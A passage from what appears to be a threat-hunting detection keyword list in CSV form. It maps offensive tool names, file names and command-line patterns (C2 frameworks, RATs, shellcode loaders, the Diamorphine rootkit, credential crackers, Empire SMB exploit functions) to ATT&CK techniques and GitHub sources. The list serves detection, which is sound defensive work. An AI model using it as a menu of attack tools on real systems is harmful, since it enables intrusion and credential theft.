security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*mac2john.py*",".{0,1000}mac2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*mac2john-alt.py*",".{0,1000}mac2john\-alt\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*MaccaroniC2.git*",".{0,1000}MaccaroniC2\.git.{0,1000}","offensive_tool_keyword","MaccaroniC2","A proof-of-concept Command & Control framework that utilizes the powerful AsyncSSH Python library which provides an asynchronous client and server implementation of the SSHv2 protocol and use PyNgrok wrapper for ngrok integration.","T1090 - T1059.003","TA0011 - TA0002","N/A","N/A","C2","https://github.com/CalfCrusher/MaccaroniC2","1","1","N/A","10","10","73","12","2023-06-27T17:43:59Z","2023-05-21T13:33:48Z" "*macchanger -r*",".{0,1000}macchanger\s\-r.{0,1000}","offensive_tool_keyword","Rudrastra","Make a Fake wireless access point aka Evil Twin","T1491 - T1090.004 - T1557.001","TA0040 - TA0011 - TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/SxNade/Rudrastra","1","0","N/A","8","1","61","20","2023-04-22T15:10:42Z","2020-11-05T09:38:15Z" 
"*MaceTrap.exe*",".{0,1000}MaceTrap\.exe.{0,1000}","offensive_tool_keyword","macetrap","MaceTrap is a proof-of-concept for time stomping using SetFileTime. MaceTrap allows you to set the CreationTime / LastAccessTime / LastWriteTime for arbitrary files and folders","T1070.004","TA0040","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/MaceTrap","1","1","N/A","N/A","10","1088","203","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" "*machine1337/TelegramRAT*",".{0,1000}machine1337\/TelegramRAT.{0,1000}","offensive_tool_keyword","TelegramRAT","Cross Platform Telegram based RAT that communicates via telegram to evade network restrictions","T1071.001 - T1105 - T1027","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/machine1337/TelegramRAT","1","1","N/A","10","10","295","48","2024-01-23T12:05:59Z","2023-06-30T10:59:55Z" "*macro_pack*",".{0,1000}macro_pack.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. 
Now it also handles various shortcuts formats.","T1566.001 - T1564.001 - T1564.003","TA0002 - TA0007 - TA0008","N/A","N/A","Exploitation tools","https://github.com/sevagas/macro_pack","1","0","N/A","N/A","10","2042","398","2022-05-12T13:30:29Z","2017-10-03T18:30:06Z" "*MacroDetectSandbox.vbs*",".{0,1000}MacroDetectSandbox\.vbs.{0,1000}","offensive_tool_keyword","phishing-HTML-linter","Phishing and Social-Engineering related scripts","T1566.001 - T1056.001","TA0040 - TA0001","N/A","N/A","Phishing","https://github.com/mgeeky/Penetration-Testing-Tools/blob/master/phishing","1","1","N/A","10","10","2434","474","2023-06-27T19:16:49Z","2018-02-02T21:24:03Z" "*MacroExploit.txt*",".{0,1000}MacroExploit\.txt.{0,1000}","offensive_tool_keyword","Excel-Exploit","MacroExploit use in excel sheet","T1137.001 - T1203 - T1059.007 - T1566.001 - T1564.003","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Mr-Cyb3rgh0st/Excel-Exploit/tree/main","1","1","N/A","N/A","1","20","4","2023-06-12T11:47:52Z","2023-06-12T11:46:53Z" "*Macrome *--decoy-document*",".{0,1000}Macrome\s.{0,1000}\-\-decoy\-document.{0,1000}","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tools","https://github.com/michaelweber/Macrome","1","0","N/A","N/A","6","519","77","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z" "*Macrome *--payload*",".{0,1000}Macrome\s.{0,1000}\-\-payload.{0,1000}","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. 
Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tools","https://github.com/michaelweber/Macrome","1","0","N/A","N/A","6","519","77","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z" "*Macrome build*",".{0,1000}Macrome\sbuild.{0,1000}","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tools","https://github.com/michaelweber/Macrome","1","0","N/A","N/A","6","519","77","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z" "*Macrome.csproj*",".{0,1000}Macrome\.csproj.{0,1000}","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tools","https://github.com/michaelweber/Macrome","1","1","N/A","N/A","6","519","77","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z" "*Macrome.dll*",".{0,1000}Macrome\.dll.{0,1000}","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. 
Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tools","https://github.com/michaelweber/Macrome","1","1","N/A","N/A","6","519","77","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z" "*Macrome.sln*",".{0,1000}Macrome\.sln.{0,1000}","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tools","https://github.com/michaelweber/Macrome","1","1","N/A","N/A","6","519","77","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z" "*MACshellcode.cpp*",".{0,1000}MACshellcode\.cpp.{0,1000}","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","4","350","93","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" "*MACshellcode.exe*",".{0,1000}MACshellcode\.exe.{0,1000}","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","4","350","93","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" 
"*MACshellcode.sln*",".{0,1000}MACshellcode\.sln.{0,1000}","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","4","350","93","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" "*MACshellcode.vcxproj*",".{0,1000}MACshellcode\.vcxproj.{0,1000}","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","4","350","93","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" "*Made by: @Trevohack | @opabravo | @matheuz*",".{0,1000}Made\sby\:\s\@Trevohack\s\|\s\@opabravo\s\|\s\@matheuz.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","N/A","9","2","132","14","2024-04-17T06:27:37Z","2023-08-13T15:05:42Z" "*MAGENT=merlinAgent*",".{0,1000}MAGENT\=merlinAgent.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - 
TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","N/A","10","10","176","58","2024-04-23T04:48:21Z","2020-07-17T20:47:56Z" "*MAGIC_PREFIX ""diamorphine_secret*",".{0,1000}MAGIC_PREFIX\s\""diamorphine_secret.{0,1000}","offensive_tool_keyword","Diamorphine","LKM rootkit for Linux Kernels","T1547.006 - T1548.002 - T1562.001 - T1027","TA0003 - TA0004 - TA0005 - TA0006 - TA0007","N/A","N/A","Persistence","https://github.com/m0nad/Diamorphine","1","0","N/A","10","10","1664","407","2023-09-20T10:56:06Z","2013-11-06T22:38:47Z" "*magicRasMan*",".{0,1000}magicRasMan.{0,1000}","offensive_tool_keyword","RasmanPotato","using RasMan service for privilege escalation","T1548.002 - T1055.002 - T1055.001 ","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/crisprss/RasmanPotato","1","0","N/A","10","4","361","54","2023-02-06T10:27:41Z","2023-02-06T09:41:51Z" "*Magnitude Exploit Kit*",".{0,1000}Magnitude\sExploit\sKit.{0,1000}","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. 
These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","0","N/A","10","10","1427","420","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" "*mail-in-the-middle.py*",".{0,1000}mail\-in\-the\-middle\.py.{0,1000}","offensive_tool_keyword","mail-in-the-middle","This script sits in the middle between a legitimate sender of an email and the legitimate recipient of that email. 
This means that we (the attackers) are receiving sensitive information not originally destined to us","T1557 - T1598.002 - T1566.002 - T1192 - T1204.002 - T1539 - T1593","TA0001 - TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/sensepost/mail-in-the-middle","1","1","N/A","8","1","78","9","2024-04-01T15:28:44Z","2024-02-21T07:25:37Z" "*mailpv.exe*",".{0,1000}mailpv\.exe.{0,1000}","offensive_tool_keyword","mailpv","Mail PassView is a small password-recovery tool that reveals the passwords and other account details in email clients","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/mailpv.html","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*mailpv.zip*",".{0,1000}mailpv\.zip.{0,1000}","offensive_tool_keyword","mailpv","Mail PassView is a small password-recovery tool that reveals the passwords and other account details in email clients","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/mailpv.html","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*MailSniper*",".{0,1000}MailSniper.{0,1000}","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc...). It can be used as a non-administrative user to search their own email. 
or by an Exchange administrator to search the mailboxes of every user in a domain","T1083 - T1114 - T1003","TA0003 - TA0007 - TA0040","N/A","N/A","Information Gathering","https://github.com/dafthack/MailSniper","1","1","N/A","N/A","10","2810","550","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" "*MailSniper.ps1*",".{0,1000}MailSniper\.ps1.{0,1000}","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2810","550","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" "*main/gcr.py*",".{0,1000}main\/gcr\.py.{0,1000}","offensive_tool_keyword","GCR-Google-Calendar-RAT","Google Calendar RAT is a PoC of Command&Control over Google Calendar Events","T1071.001 - T1021.002 - T1059","TA0002 - TA0005","N/A","N/A","C2","https://github.com/MrSaighnal/GCR-Google-Calendar-RAT","1","1","N/A","10","10","203","37","2024-04-11T18:06:02Z","2023-06-18T13:23:31Z" "*main_air_service-probes.go*",".{0,1000}main_air_service\-probes\.go.{0,1000}","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 
- T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","10","10","1502","215","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z" "*main_pro_service-probes.go*",".{0,1000}main_pro_service\-probes\.go.{0,1000}","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","10","10","1502","215","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z" "*make 
image && make proxydll*",".{0,1000}make\simage\s\&\&\smake\sproxydll.{0,1000}","offensive_tool_keyword","NimDllSideload","DLL sideloading/proxying","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/byt3bl33d3r/NimDllSideload","1","0","N/A","9","2","157","17","2022-12-04T21:52:49Z","2022-12-03T03:25:57Z" "*make image && make proxydll*",".{0,1000}make\simage\s\&\&\smake\sproxydll.{0,1000}","offensive_tool_keyword","nimproxydll","A Docker container for byt3bl33d3r/NimDllSideload - DLL sideloading/proxying","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/cyllective/nimproxydll","1","0","N/A","9","1","11","0","2024-03-22T10:29:56Z","2024-03-15T15:15:45Z" "*make onionpipe*",".{0,1000}make\sonionpipe.{0,1000}","offensive_tool_keyword","onionpipe","onionpipe forwards ports on the local host to remote Onion addresses as Tor hidden services and vice-versa.","T1090.003 - T1573.002","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/cmars/onionpipe","1","0","N/A","10","5","449","29","2024-04-27T15:07:14Z","2022-01-23T06:52:13Z" "*make proxychains quiet*",".{0,1000}make\sproxychains\squiet.{0,1000}","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027","TA0001 - TA0042","N/A","N/A","Exploitation tools","https://github.com/haad/proxychains","1","0","N/A","8","10","6069","591","2024-01-02T11:23:26Z","2011-02-25T12:27:05Z" "*make shared dir for kidlogger ini files*",".{0,1000}make\sshared\sdir\sfor\skidlogger\sini\sfiles.{0,1000}","offensive_tool_keyword","kiglogger","malware parental control software - keylogger","T1056.001 - T1113 - T1056.004","TA0006 - TA0009","N/A","N/A","Collection","https://kidlogger.net/download.html","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*make_avet -l *.exe 
*",".{0,1000}make_avet\s\-l\s.{0,1000}\.exe\s.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","0","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*make_avetsvc *",".{0,1000}make_avetsvc\s.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","0","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*make_kernel_shellcode*",".{0,1000}make_kernel_shellcode.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Exploit-EternalBlue.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*make_kernel_user_payload*",".{0,1000}make_kernel_user_payload.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Exploit-EternalBlue.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*make_smb1_anonymous_login_packet*",".{0,1000}make_smb1_anonymous_login_packet.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Exploit-EternalBlue.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*make_smb1_echo_packet*",".{0,1000}make_smb1_echo_packet.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Exploit-EternalBlue.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*make_smb1_free_hole_session_packet*",".{0,1000}make_smb1_free_hole_session_packet.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
